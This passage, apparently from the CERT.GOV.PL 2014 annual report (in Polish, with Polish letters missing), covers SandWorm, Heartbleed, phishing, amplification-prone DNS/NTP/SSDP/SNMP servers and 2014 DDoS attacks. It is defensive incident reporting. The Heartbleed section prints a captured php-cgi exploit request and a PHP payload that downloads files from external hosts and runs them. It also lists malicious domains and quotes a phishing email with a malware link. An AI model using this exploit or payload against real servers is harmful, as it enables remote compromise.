z rodziny Windows oraz Windows Server 2008 i 2012, zostaa opublikowana w dniu
15 padziernika 2014 roku. Przedmiotowa podatno bya wykorzystana w kampanii cyberszpiegowskiej nazwanej SandWorm, ktrej celem byy m.in. NATO, instytucje administracji
publicznej i firmy z sektora energetycznego oraz telekomunikacyjnego w krajach Unii
Europejskiej i na Ukrainie, a take uczelnie w Stanach Zjednoczonych.
Logo kampanii 10
Atakujcy do infekcji wykorzystali szereg podatnoci m.in. CVE-2014-4114 dotyczca bdu
w mechanizmie Windows OLE pozwalajcego na zdalne wykonanie kodu w kontekcie
aktualnie zalogowanego uytkownika. Skompromitowany system infekowany by zoliwym
oprogramowaniem m.in. z rodziny BlackEnergy.
W zwizku z powyszym zagroeniem Zesp CERT.GOV.PL podj dziaania skierowane
do instytucji administracji pastwowej oraz sektora energetycznego infrastruktury
krytycznej, zmierzajce do ograniczenia moliwoci eskalacji zagroenia. Przekazano list
adresw IP serwerw zarzdzajcych (C&C) biorcych udzia w kampanii, celem weryfikacji
czy doszo do pocze wraz z zaleceniami m.in. natychmiastowej aktualizacji wszystkich
komputerw wykorzystujcych podatne wersje systemw operacyjnych Windows.
W ramach firm i instytucji, ktre byy adresatem przedmiotowej informacji, jedynie 13%
potwierdzio wykrycie ruchu sieciowego zwizanego ze wskazanymi serwerami C&C.
10
rdo: www.isightpartners.com
CERT.GOV.PL
19 / 58

Dziaania podjte przez Zesp CERT.GOV.PL w oparciu o poprawki bezpieczestwa wydane
przez firm Microsoft, pozwoliy na szybk weryfikacj systemw teleinformatycznych
administracji pastwowej oraz infrastruktury krytycznej pod ktem wystpowania
przedmiotowej podatnoci i eliminacj zagroenia.
2.3. Heartbleed
W 2014 roku w oprogramowaniu OpenSSL wykryto krytyczn luk bezpieczestwa
w implementacji funkcjonalnoci heartbeat protokou TLS/DTLS. Podatne wersje
oprogramowania: 1.0.1, 1.0.2-beta, 1.0.1f i 1.0.2beta1. Wykryty bd umoliwia atakujcemu
odczytanie z pamici danych dotyczcych np: kluczy prywatnych lub danych przesyanych
przez uytkownikw zaszyfrowanym kanaem komunikacji. Atakujc zdalnie usug, ktra
korzysta z podatnej wersji oprogramowania OpenSSL, nieuprawniona osoba moe by
w stanie uzyska wraliwe dane, ktre nastpnie mog posuy np. do procesu dekryptau
zaszyfrowanych informacji, podszycia si pod innego uytkownika czy atakw typu Man
in the Middle 11.
Heartbleed a ARAKIS-GOV
System ARAKIS-GOV w pierwszych dniach po opublikowaniu informacji na temat powyszej
luki zarejestrowa wzrost aktywnoci na portach TCP, zwizanych z usugami, ktre
najczciej wykorzystuj bibliotek OpenSSL: 443 (HTTPS), 465 (SMTPS), 993 (IMAP), 995
(POP3):
11
Atak typu Man in the Middle atak polegajcy na podsuchiwaniu i modyfikowaniu wiadomoci przesyanych
pomidzy dwiema stronami bez ich wiedzy.
20 / 58
CERT.GOV.PL
W lipcu 2014 roku system ARAKIS-GOV odnotowa wzrost aktywnoci na porcie 80/TCP
wynikajcy z procesu skanowania w poszukiwaniu serwerw WWW podatnych na bd
w silniku PHP wykryty w 2012 roku (CVE-2012-1823). Na podstawie analizy danych
z systemw honeypot-owych dziaajcych w ramach sensorw ARAKIS-GOV zidentyfikowano
dania POST HTTP:
POST /cgi-bin/php5cgi%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%
73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6
D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74
CERT.GOV.PL
21 / 58

%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%
65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F
%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%7
4%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65
%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%
6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%7
0%3A%2F%2F%69%6E%70%75%74+%2D%6E
ktre po zdekodowaniu wygldaj nastpujco:

POST /cgi-bin/php5-cgi -d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d
disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d
cgi.redirect_status_env="yes" -d cgi.fix_pathinfo=1 -d auto_prepend_file=php://input -n-d
allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d
open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env="yes"
-d cgi.fix_pathinfo=1 -d auto_prepend_file=php://input -n
Powysze danie pozwala atakujcemu na zdalne wykonanie kodu zoliwego (przesyanego

jako dane w przedmiotowym daniu) na podatnym serwerze WWW. W ramach
zaobserwowanego dania zoliwy skrypt, ktry mia zosta wykonany na serwerze wyglda
nastpujco:
<?php
$tmp = sys_get_temp_dir();
$path = getcwd();
$file = "gimp.html";
$url = "http://eleven11root.servepics.com";
system("wget $url -P - -O" . $tmp . "/gimp.html");
system("chmod -R 777" . $tmp ."/gimp.html");
chmod ($tmp."/".$file,0777);
system($tmp . "/gimp.html");
$file2 = "gimp.html";
$url2 = "http://twelfe12root.servepics.com";
system("wget $url2 -P - -O" . $tmp . "/gimp.html");
system("chmod -R 777" . $tmp ."/gimp.html");
chmod ($tmp."/".$file2,0777);
system($tmp . "/gimp.html");
echo $tmp;
echo $path;
die($tmp);
?>
Powyszy skrypt odpowiedzialny by za pobranie pliku gimp.html z zewntrznych

serwerw, zapisanie go w katalogu tymczasowym serwera WWW, zmian uprawnie pliku
i uruchomienie go w powoce systemowej serwera.
Analizujc okoo 17000 da tego typu odnotowanych przez system ARAKIS-GOV w okresie
19-21 lipca 2014 roku stwierdzono wykorzystanie 4 rnych domen, z ktrych pobierane
miay by przez skrypt pliki gimp.html, pimp.html, e.html, excel.html, index.html:
22 / 58
CERT.GOV.PL

eleven11root.servepics.com
twelfe12root.servepics.com
jappyupdate.servehttp.com
linuxupdatejappy.servepics.com
Zesp CERT.GOV.PL przeprowadzi kampani informacyjno-prewencyjn, w ramach ktrej

wysa do instytucji administracji pastwowej kilkaset informacji o serwerach WWW
wykorzystujcych podatn wersj oprogramowania OpenSSL oraz wyda zalecenia
natychmiastowej aktualizacji oprogramowania OpenSSL na serwerach do wersji niepodatnej
na atak. Najwicej powiadomie zostao wysanych do instytucji skategoryzowanych jako
pozostae (37% wszystkich wysanych powiadomie) oraz urzdy (34%). We wszystkich
wykrytych przez Zesp CERT.GOV.PL podatnych serwerach poprawiono konfiguracj.
6%
Suby porzdku publicznego

i wojsko
6%
7%
37%
Instytuty
Ministerstwa
10%
Przemys
Urzdy
34%
Pozostae
Wykres 14. Wysane informacje o podatnoci Heartbleed przez Zesp CERT.GOV.PL
2.4. Kampanie phishingowe

W 2014 roku Zesp CERT.GOV.PL zarejestrowa 119 incydentw typu inynieria spoeczna,
co w porwnaniu do roku ubiegego stanowio wzrost o 350% (w 2013 roku
zarejestrowanych zostao 34 incydentw bdcych sum kategorii: inynieria spoeczna,
Kradzie tosamoci, podszycie si w tym Phishing). Poniej zosta przedstawiony wykres
incydentw typu inynieria spoeczna zarejestrowanych w 2014 roku z podziaem
na miesice.
CERT.GOV.PL
23 / 58

30
20
grudzie
listopad
wrzesie
sierpie
lipiec
czerwiec
padziernik
10
maj
kwiecie
marzec
stycze
luty
15
Wykres 15. Ilo incydentw klasy: inynieria spoeczna zarejestrowanych w 2014 roku
Na powyszym wykresie widoczny jest wzrost odnotowany w drugiej poowie 2014 roku,
ktry istotnie by zwizany ze wzrostem aktywnoci kampanii phishingowych. Naley jednak
zaznaczy, i zgodnie z aktualnym katalogiem zagroe Zespou CERT.GOV.PL w kategorii
incydentw inynieria spoeczna znajduj sie nie tylko incydenty zwizane z atakami typu
phishing. Std te Zesp CERT.GOV.PL wyoni w ramach incydentw tej kategorii
24 incydenty uznane, jako istotne kampanie phishingowe bdce atakami prowadzonymi
na szerok skal, dotyczce m.in. administracji publicznej.
Przedmiotowe kampanie byy zwizane z wiadomociami wykorzystujcymi techniki
inynierii spoecznej, majcych na celu wyudzenie danych wraliwych za porednictwem
wiadomoci e-mail lub spreparowanych stron internetowych, a take infekcje
oprogramowaniem zoliwym nakaniajc uytkownika do skorzystania z zacznika lub
odnonika o charakterze zoliwym. Kampanie kierowane m.in. do instytucji administracji
publicznej czsto wykorzystyway wizerunek znanych firm, instytucji prowadzcych sprzeda
w sieci Internet lub firm poredniczcych, jak np. firmy kurierskie, serwisy aukcyjne
czy rezerwacyjne, banki, operatorzy telekomunikacyjni.
W zwizku z powyszym w 2014 roku wykazano wzrost iloci odnotowywanych przez Zesp
CERT.GOV.PL kampanii phishingowych, ze szczeglnym uwzgldnieniem miesica czerwca
i lipca. Na uwag zasuguje rwnie fakt, i w pierwszej poowie roku przewaay wiadomoci
prbujce nakoni uytkownikw do ujawnienia informacji wraliwych za porednictwem
wiadomoci e-mail lub specjalnie spreparowanych witryn internetowych. Natomiast
w drugiej poowie rozsyane wiadomoci w wikszej iloci zawieray zaczniki
o charakterze zoliwym. W celu ukrycia szkodliwej treci przed systemami detekcji
wykorzystywane byy zaczniki w postaci archiww. Do infekcji oprogramowaniem
24 / 58
CERT.GOV.PL

zoliwym, najczciej stosowane by jzyki skryptowe w postaci makr 12 w dokumentach
pakietu Microsoft Office lub Javascript w formacie PDF. Wykorzystywano rwnie pliki
wykonywalne o rozszerzeniu .scr 13 lub .pif 14, imitujce wyej wymienione dokumenty
tekstowe. Tytu oraz tre przedmiotowych wiadomoci, wykorzystyway wizerunek znanych
firm i instytucji, a w kilku przypadkach do tego stopnia, e wiadomoci te naley uzna
za udzco podobne do rzeczywistych. Najczciej temat wiadomoci wskazywa na odbir
przesyki, uregulowanie zobowiza finansowych lub prawnych, itp. W wikszoci
przypadkw wiadomoci byy rozsyane za pomoc sieci typu botnet, pojedynczych
skompromitowanych stacji lub serwerw oraz automatw wysykowych. Adres nadawcy by
sfaszowany lub generowany a dopiero analiza penych nagwkw pocztowych pozwalaa na
ustalenie rzeczywistego rda.
Wiadomoci email zawierajce faszyw aktualizacj BeSTi@
W dniu 20 marca 2014 roku, Zesp CERT.GOV.PL uzyska informacj o wiadomociach e-mail
zawierajcych faszyw aktualizacj systemu BeSTi@ (system zarzdzania budetem
jednostek Samorzdu Terytorialnego) w wersji 3.02.012.07 15. Zgodnie z uzyskanymi
informacjami powysza korespondencja zostaa rozesana do jednostek samorzdu
terytorialnego. Wiadomoci zawierajce faszyw aktualizacj wysane zostay z adresu
pomoc@budzetjsf.pl, bdcego podobnym do adresu wykonawcy systemu
pomoc@budzetjst.pl. Przedmiotowe e-maile rozsyane byy w dniu 17 marca 2014 roku. Nie
odnotowano aby wyej wymienione wiadomoci byy wysane z innych adresw. Poniej
przykadowa tre wiadomoci (pisownia oryginalna):
Witamy,
Pragniemy poinformowa, i dnia dzisiejszego zostaa udostpniona nowa
aktualizacja do systemu BeSTi@ w wersji 3.02.012.07.
Aktualizacja usuwa bdy zwizane z bezpieczestwem bazy danych oraz
poprawia problem z podpisem elektronicznym sprawozda.
Instalacja jest bardzo prosta i nie wymaga dodatkowej pomocy oraz czynnoci.
Ze wzgldu na znaczce poprawki bezpieczestwa aktualizacja nie jest
dostpna z menu programu BeSTia, naley przeprowadzi j rcznie.
Poniszy plik Bestia.3.02.012.07 naley zapisa na pulpicie lub w
innym miejscu a nastpnie go uruchomi co spowoduje zainstalowanie
12
makro kod zawierajcy zestaw rozkazw wykonywanych przez okrelon aplikacj, w celu automatyzacji
pewnych czynnoci lub dokonywania zmian w dokumentach bez interakcji z uytkownikiem.
13
.scr pliki domylnie kojarzone z wygaszaczem ekranu systemu Microsoft Windows (ang. Windows Screen
Saver ), mogce wykona kady kod maszynowy Win32.
14
.pif (ang. Program Information File) pliki zawierajce informacje na temat programw.
15
obowizujc wersj oprogramowania na dzie 20.03.2014r. bya wersja 3.02.012.06
CERT.GOV.PL
25 / 58

uaktualnienia do systemu BeSTi@.
http://budzetjsf.pl/Update/BeSTia/Bestia.3.02.012.07.exe
Instalacja nie powinna zaj wicej ni minut.
Dzikujemy i przepraszamy za niedogodnoci
Sputnik Software
tel. 61 622 00 60
tel. 32 722 11 96
Po przeprowadzeniu analizy behawioralnej pliku Bestia.3.02.012.07.exe o skrcie
kryptograficznym MD5: 9bb03bb5af40d1202378f95a6485fba8, znajdujcego si
w odnoniku przedmiotowej wiadomoci, ustalono, i po jego uruchomieniu nawizywana
bya komunikacja z adresem IP na porcie 81, a na stacji roboczej tworzone byy nastpujce
pliki:
C:\Documents and Settings\Administrator\Application Data\driver--grap.exe
C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\ Windows.lnkinfo
W wyniku obsugi przedmiotowego incydentu, rozesano wiadomoci e-mail do Regionalnych

Izb Obrachunkowych (do ktrych m.in. system BeSTi@ jest kierowany) z informacjami
o e-mailach zawierajcych faszyw aktualizacj systemu oraz poproszono o przesanie
przedmiotowych zoliwych wiadomoci wraz z nagwkami. W odpowiedzi od Urzdw
Gmin, do ktrych przysana zostaa zoliwa wiadomo, uzyskano informacje e adna
z instytucji nie uruchomia zoliwego pliku zawartego w odnoniku.
Faszywe wiadomoci podszywanie si pod Zakad Ubezpiecze Spoecznych
Na pocztku drugiego kwartau Zesp CERT.GOV.PL obsugiwa incydent dotyczcy
rozesanych wiadomoci e-mail od nadawcy podszywajcego si pod Zakad Ubezpiecze
Spoecznych, ktre zawieray zacznik ze zoliwym oprogramowaniem. Przedmiotowa
wiadomo przygotowana zostaa w sposb majcy na celu przekonanie jej odbiorcw,
i rozesana zostaa przez Zakad Ubezpiecze Spoecznych o czym wiadczy zarwno uyty
adres nadawcy tj. e.bok.zus.rozliczenia@prokonto.pl, temat wiadomoci Nadpata
za wiadczenia za 2013 r oraz tytu zacznika Dokument Nadpata.scr. Na podstawie
przeprowadzonej analizy ustalono, i zacznik zosta skompilowany w oprogramowaniu MS
Visual C++ v8.0 przy wykorzystaniu moduu WINRAR.SFX. Po uruchomieniu, skrypty
zaszyte w pliku wykazuj okresow aktywno sieciow w odstpach czasu wynoszcych
26 / 58
CERT.GOV.PL

okoo 60 sekund. Zainfekowany plik wykazuje aktywno na porcie 3366 TCP (poczenia
inicjowane s z portu 1025). Przedmiotowa dystrybucja wiadomoci e-mail moga mie
na celu okrelenie iloci oraz grupy docelowej osb, ktre zainfekuj si zaczonym
zoliwym oprogramowaniem. Na przedmiotowy fakt, w chwili analizy, mg wskazywa brak
komunikacji zwrotnej z serwera, z ktrym oprogramowanie zoliwe nawizywao poczenia.
Faszywe wiadomoci - podszywanie si pod Poczt Polsk

W lipcu 2014 roku Zesp CERT.GOV.PL zaobserwowa kampani phishingow, ktra bya
skierowana do instytucji administracji publicznej, ale take do sektora prywatnego.
Rozsyane byy wiadomoci e-mail od nadawcw, podszywajcych si pod Poczt Polsk,
informujcych o koniecznoci odbioru przesyki kurierskiej. Wiadomoci zostay wysane
z adresu informacja@poczta-polska.pl i byy zatytuowane: Poczta Polska S.A. eINFO. Poniej
przedstawiono tre przedmiotowej wiadomoci (pisownia oryginalna):
Szanowny Kliencie,
Przesylka kurierska Przesylka Nr: 0015900845296116015 Kwota pobrania: 142,80 zl .
Oczekuje na odbior do 2014-07-25
CERT.GOV.PL
27 / 58

- aby wyswietlic informacje o usludze:
http://www.poczta-polska.pl
Ta wiadomosc zostala wygenerowana automatycznie, prosimy na nia
nie odpowiadac.
Z powazaniem,
Poczta Polska
Codziennie dla Ciebie
W wyniku wykonanej analizy stwierdzono, e:
w zaczniku wiadomoci pocztowej znajdowa si plik pdf.zip, ktry zawiera wirusa

typu ko trojaski Asprox.B;
adresy hostw nadawczych byy losowe;
adresem nadawcy zawsze by adres informacja@poczta-polska.pl. Adres ten jest
oficjalnym adresem wysyki powiadomie.
W dniu 25 lipca 2014 roku Zesp CERT.GOV.PL zamieci na portalu www.cert.gov.pl

ostrzeenie o faszywych wiadomociach wysyanych do administracji publicznej zalecajc
zachowanie szczeglnej ostronoci oraz zweryfikowanie ich autentycznoci, a take
niepodejmowanie dziaa mogcych skutkowa skorzystaniem z zawartych odnonikw
i zacznikw.
Rwnie Poczta Polska na swojej witrynie internetowej www.poczta-polska.pl 16 zamiecia
informacje z ostrzeeniem o przedmiotowych wiadomociach:
Uwaga na faszywe maile
Szanowni Pastwo, dzi od rana kto podszywajcy si pod Poczt Polsk rozsya maile do
klientw informujc o koniecznoci odbioru przesyki kurierskiej. Informacje te nie zostay
nadane przez Poczt Polsk.
Prosimy o zwrcenie szczeglnej uwagi na numer przesyki zawarty w mailach.
Korespondencja od Poczty Polskiej zawiera numery przesyek 13 znakowe lub 20 cyfrowe.
Dodatkowo maile spoza sieci Poczty Polskiej nie zawieraj informacji adresowych
dotyczcych placwki, w ktrej naley odbiera przesyk. Nie zawieraj take polskich
16
www.poczta-polska.pl/uwaga-na-numery-przesylek-w-powiadomieniach-e-mail
28 / 58
CERT.GOV.PL

znakw.
Prosimy o uwane sprawdzenie oraz ignorowanie maili z bdnym numerem przesyki
i brakiem adresu placwki pocztowej, a take nie otwieranie zacznikw, ktre mog
zawiera oprogramowanie wirusowe. Poczta Polska podja odpowiednie dziaania
wyjaniajce w tej sprawie.
2.5. Podatnoci
Open DNS Resolver (Domain Name System)
W 2014 roku Zesp CERT.GOV.PL kontynuowa dziaania zwizane z podatnociami
serwerw DNS znajdujcych si w przestrzeni adresowej instytucji administracji pastwowej.
Naley przypomnie, e w zwizku z bdn konfiguracj (brak ograniczenia korzystania
z serwera do zaufanych adresw IP), serwery pozwalaj na wykonanie zapytania DNS
o dowoln domen, z dowolnego adresu IP z sieci Internet. Wektor ataku przedstawia si
nastpujco:
Atakujcy wysya
zapytanie do serwerw
DNS, podmieniajc adres
rdowy na adres IP celu
Serwery DNS otrzymuj

zapytania i wysyaj
odpowiedzi na adres IP
celu
Cel otrzymuje odpowiedzi

od serwerw DNS,
co w efekcie powoduje
wysanie do niego duej
liczby pakietw
i wysycenie cza
Rysunek 1. Scenariusz ataku z wykorzystaniem podatnoci DNS
Podatno ta moe by wykorzystana do przeprowadzenia ataku ze zwielokrotnieniem (ang.

amplification attack), ktry jest jedn z odmian ataku Distributed Denial of Service (DDoS).
Jednym ze sposobw na przeprowadzenie ataku jest wysyanie do powszechnie dostpnego
serwera DNS zapyta DNS lookup ze zmodyfikowanym (podmienionym) adresem
rdowym, ustawionym na adres IP celu. W wyniku powyszego, wszystkie odpowiedzi
kierowane do serwera DNS, s przesyane na adres IP celu, co w rezultacie powoduje
wysanie do niego ogromnej liczby pakietw. Na rysunkach 2 i 3 przedstawiono kolejno:
odpowied od serwera DNS wykazujcego podatno i odpowied od poprawnie
skonfigurowanego serwera DNS.
CERT.GOV.PL
29 / 58

Rysunek 2. Odpowied otrzymana od niepoprawnie skonfigurowanego serwera DNS
Rysunek 3. Odpowied otrzymana od poprawnie skonfigurowanego serwera DNS
Zesp CERT.GOV.PL, w przecigu roku 2014 wysa do instytucji administracji pastwowej

4683 informacje o podatnoci serwerw DNS, czyli o 33 informacje mniej ni w roku
poprzednim. Zostao wysanych niemal piciokrotnie mniej powiadomie do instytucji
skategoryzowanych jako suby porzdku publicznego i wojsko ni w roku poprzednim (2013
1532 powiadomienia, 2014 317 powiadomie), co pokazuje, e dziaania podejmowane
przez Zesp CERT.GOV.PL przynosz wymierne efekty w sferze podnoszenia bezpieczestwa
teleinformatycznego instytucji pastwowych. Najwicej powiadomie zostao przekazanych
30 / 58
CERT.GOV.PL

do instytucji skategoryzowanych jako przemys (57% wszystkich wysanych powiadomie)
oraz urzdy (19%).
1%
Przemys
2678
Urzdy
7%
13%
Suby porzdku
publicznego i
wojsko
628
Suby porzdku
publicznego i
wojsko
Instytuty
Instytuty
Ministerstwa
878
Pozostae
Ministerstwa
3%
317
134
48
Wykres 16. Ilo wysanych informacji

o podatnoci DNS
57%
Pozostae
19%
Urzdy
Przemys
Wykres 17. Udzia procentowy typw instytucji

do iloci wysanych zgosze
Open NTP (Network Time Protocol)

W 2014 roku Zesp CERT.GOV.PL zaobserwowa podatnoci serwerw NTP znajdujcych si
w przestrzeni adresowej instytucji administracji pastwowej, pozwalajcych na wykonanie
dowolnego zapytania NTP z dowolnego adresu IP z sieci Internet. Usuga NTP, ktra
domylnie dziaa na porcie 123, pozwala na synchronizacj czasu pomidzy urzdzeniami
podczonymi do sieci Internet.
CERT.GOV.PL
31 / 58

Atakujcy wysya
zapytanie do serwerw
NTP, podmieniajc adres
rdowy na adres IP celu
Serwery NTP otrzymuj

zapytania i wysyaj
odpowiedzi na adres IP
celu
Cel otrzymuje odpowiedzi

od serwerw NTP,
co w efekcie powoduje
wysanie do niego duej
liczby pakietw
i wysycenie cza
Rysunek 4. Scenariusz ataku z wykorzystaniem podatnoci NTP

Mechanizm ataku z wykorzystaniem serwera NTP jest bliniaczy do mechanizmu ataku
z wykorzystaniem serwera DNS - atakujcy kieruje do powszechnie dostpnego serwera NTP
zapytania NTP ze zmodyfikowanym (podmienionym) adresem rdowym, ustawionym na
adres IP celu. W wyniku powyszego, wszystkie odpowiedzi kierowane do serwera NTP, s
przesyane na adres IP celu, co w rezultacie powoduje wysanie do niego ogromnej liczby
pakietw. Na rysunkach 5 i 6 przedstawiono kolejno: odpowied od serwera NTP
wykazujcego podatno i odpowied od poprawnie skonfigurowanego serwera NTP.
Rysunek 5. Odpowied otrzymana od niepoprawnie skonfigurowanego serwera NTP
Rysunek 6. Odpowied otrzymana od poprawnie skonfigurowanego serwera NTP
32 / 58
CERT.GOV.PL

Zabezpieczenie serwera wiadczcego usug NTP jest moliwe np. poprzez permanentne
wyczenie usugi lub ograniczenie moliwoci synchronizacji czasu wycznie do zaufanych
adresw IP. Naley przy tym jednak zaznaczy, e w przypadku poprawnie zabezpieczonego
serwera NTP nie powinien on odwoywa si do innych serwerw NTP (parametr refid),
poniewa w razie ewentualnego ataku, taka konfiguracja spowoduje, e serwer bdzie
poredniczy w ruchu.
W 2014 roku Zesp CERT.GOV.PL wysa do instytucji administracji pastwowej 8106
informacji o podatnoci serwerw NTP. Najwicej powiadomie zostao przekazanych do
instytucji skategoryzowanych jako urzdy (32% wszystkich wysanych powiadomie),
pozostae (23%) oraz przemys (22%).
Urzdy
2596
4%
Pozostae
1886
5%
Ministerstwa
32%
Przemys
Instytuty
14%
1798
Suby porzdku
publicznego i wojsko
Suby porzdku
publicznego i
wojsko
1088
Przemys
22%
Ministerstwa
390
Instytuty
348

o podatnoci NTP
23%
Pozostae
Urzdy

SSDP (Simple Service Discovery Protocol)

Zaobserwowane podatnoci protokou SSDP pozwalaj na specjalne spreparowanie
i wysanie do urzdze sieciowych zapyta typu NOTIFY i M-SEARCH. Protok SSDP, ktry
domylnie dziaa na porcie 1900, jest czci protokou UPnP i pozwala urzdzeniom
sieciowym na atwe odnajdywanie si i ustanawianie usug sucych m.in. do wymiany
danych lub komunikacji.
CERT.GOV.PL
33 / 58

Atakujcy skanuje
sie celem
uzyskania listy
podatnych
urzdze
sieciowych
Atakujcy wysya
zapytania
M-SEARCH lub
NOTIFY do
urzdze
sieciowych,
podmieniajc
adres rdowy na
adres IP celu
Urzdzenia
sieciowe
otrzymuj
zapytania i
wysyaj
odpowiedzi na
adres IP celu
Cel otrzymuje
odpowiedzi od
urzdze
sieciowych,
co w efekcie
powoduje
wysanie do niego
duej liczby
pakietw
i wysycenie cza
Rysunek 7. Scenariusz ataku z wykorzystaniem podatnoci SSDP

Mechanizm ataku z wykorzystaniem protokou SSDP skada si z dwch etapw etapu
skanowania sieci w poszukiwaniu podatnych urzdze sieciowych i etapu ataku. Etap
pierwszy polega na spreparowaniu zapyta M-SEARCH lub NOTIFY i wysaniu ich na jak
najwiksz ilo adresw IP, znajdujcych si w danej puli adresowej celem zebrania listy
adresw IP urzdze sieciowych, ktre moe wykorzysta w ataku (podatne urzdzenia
odpowiadaj daniem typu HTTP M-SEARCH zawierajcym lokalizacj pliku z opisem
urzdzenia). Etap drugi przebiega w sposb identyczny jak ataki wykorzystujce podatnoci
Open DNS Resolver oraz Open NTP.
Na rysunkach 8 i 9 przedstawiono kolejno: przykad adresu IP wykazujcego podatno
i przykad poprawnie zabezpieczonego przed podatnoci adresu IP.
Rysunek 8. Przykad adresu IP wykazujcego podatno SSDP
34 / 58
CERT.GOV.PL
Rysunek 9. Przykad poprawnie zabezpieczonego przed podatnoci SSDP adresu IP
Zabezpieczenie urzdze sieciowych przed opisan powyej podatnoci jest moliwe

poprzez np. permanentne wyczenie usugi lub ograniczenie komunikacji wycznie do
zaufanych adresw IP. W 2014 roku Zesp CERT.GOV.PL wysa do instytucji administracji
pastwowej 1423 informacji o podatnoci SSDP. Najwicej powiadomie zostao wysanych
do instytucji skategoryzowanych jako przemys (40% wszystkich wysanych powiadomie),
urzdy (29%) oraz suby porzdku publicznego i wojsko (26%). Naley jednak zaznaczy, e
w oglnym rozrachunku blisko 92% wszystkich wysanych powiadomie zostao
skierowanych do okoo 27% instytucji, ktrych dotyczya podatno SSDP.
Urzdy
422
Suby porzdku
publicznego i
wojsko
Pozostae
Pozostae
26%
40%
Suby
porzdku
publicznego
i wojsko
Urzdy
366
67

o podatnoci SSDP
CERT.GOV.PL
5%
568
Przemys
29%
Przemys

35 / 58

SNMP (Simple Network Management Protocol)
Zaobserwowane podatnoci pozwalaj na specjalne spreparowanie i wysanie do urzdze
sieciowych zapyta typu GetBulk. Protok SNMP, ktry domylnie dziaa na porcie 161, jest
powszechnie wykorzystywany do zarzdzania urzdzeniami sieciowymi posiadajcymi
wasny adres IP.
Atakujcy skanuje
sie celem
uzyskania listy
podatnych
urzdze
sieciowych
Atakujcy wysya
zapytania GetBulk
do urzdze
sieciowych,
podmieniajc
adres rdowy na
adres IP celu
Urzdzenia
sieciowe
otrzymuj
zapytania i
wysyaj
odpowiedzi na
adres IP celu
Cel otrzymuje
odpowiedzi od
urzdze
sieciowych,
co w efekcie
powoduje
wysanie do niego
duej liczby
pakietw
i wysycenie cza
Rysunek 10. Scenariusz ataku z wykorzystaniem podatnoci SNMP

Mechanizm ataku z wykorzystaniem protokou SNMP, podobnie jak SSDP, skada si z dwch
etapw etapu skanowania sieci w poszukiwaniu podatnych urzdze sieciowych i etapu
ataku. Oba etapy przebiegaj w sposb identyczny jak ataki wykorzystujce podatno SSDP
z t rnic, e do urzdze sieciowych zamiast zapyta typu M-SEARCH lub NOTIFY s
kierowane zapytania typu GetBulk.
Na rysunkach 11 i 12 przedstawiono kolejno: przykad adresu IP wykazujcego podatno
i przykad poprawnie zabezpieczonego przed podatnoci adresu IP.
Rysunek 11. Przykad adresu IP wykazujcego podatno SSDP
36 / 58
CERT.GOV.PL
Rysunek 12. Przykad poprawnie zabezpieczonego przed podatnoci SSDP adresu IP
Zabezpieczenie urzdze sieciowych przed opisan powyej podatnoci jest moliwe

poprzez np. permanentne wyczenie usugi lub ograniczenie komunikacji wycznie do
zaufanych adresw IP.
Zesp CERT.GOV.PL, w cigu poprzedniego roku wysa do instytucji administracji
pastwowej 2615 informacji o podatnoci SNMP. Najwicej powiadomie zostao wysanych
do instytucji skategoryzowanych jako pozostae (31% wszystkich wysanych powiadomie),
suby porzdku publicznego i wojsko (23%) oraz przemys (21%).
2%
800
Pozostae
Suby porzdku
publicznego i wojsko
598
31%
16%
Przemys
417
Urzdy
21%
187
Instytuty
23%
52

o podatnoci SSDP
CERT.GOV.PL
Instytuty
Urzdy
561
Przemys
Ministerstwa
Ministerstwa
7%
Suby porzdk
publicznego i
wojsko
Pozostae

37 / 58

2.6. DDoS (Distributed Denial of Service)

W dniach 1417 sierpnia 2014 roku przeprowadzono ataki DDoS na strony internetowe
www.prezydent.pl oraz www.gpw.pl, a take na niektre witryny instytucji administracji
pastwowej. Do wspomnianych atakw przyznaa si na swojej stronie grupa
przedstawiajca si jako CyberBerkut podajc jako powd atakw rzekome zaangaowanie
Polski w konflikt zwizany z sytuacj na Ukrainie.
Zanotowane ataki byy poczeniem ataku typu SYN FLOOD i ataku wolumetrycznego.
Podstaw ataku SYN FLOOD jest wysyanie duej iloci zapyta synchronizacji (SYN) do
serwera celem wysycenia zasobw jakimi on dysponuje. W momencie otrzymania dania
synchronizacji, serwer wysya potwierdzenie swojej dostpnoci poprzez wysanie pakietu
SYN-ACK i oczekuje na odpowied ACK, ktra zazwyczaj nigdy nie nadejdzie. Podstaw ataku
wolumetrycznego jest wysycenie zasobw serwera poprzez wysyanie na adres celu ataku
ogromnej liczby pakietw w krtkim czasie.
Zesp CERT.GOV.PL udzieli wsparcia atakowanym instytucjom w celu jak najszybszego
przywrcenia dostpnoci witryn.
W zwizku z zaistnia sytuacj, Zesp CERT.GOV.PL przekaza instytucjom zalecenia
zmierzajce do podniesienia zdolnoci odparcia atakw DDoS. Dokonana zostaa rwnie, na
podstawie danych deklaratywnych, analiza stanu bezpieczestwa serwerw hostujcych
strony WWW, nalece do kilkudziesiciu gwnych instytucji administracji pastwowej.
Ocenie poddawany by szereg mechanizmw i uwarunkowa, ktre mogyby pozwoli
jednostce na skuteczne odparcie potencjalnego ataku DDoS. Wskaza naley, e wiele
instytucji zadanie utrzymania swoich stron internetowych zlecio podmiotom zewntrznym.
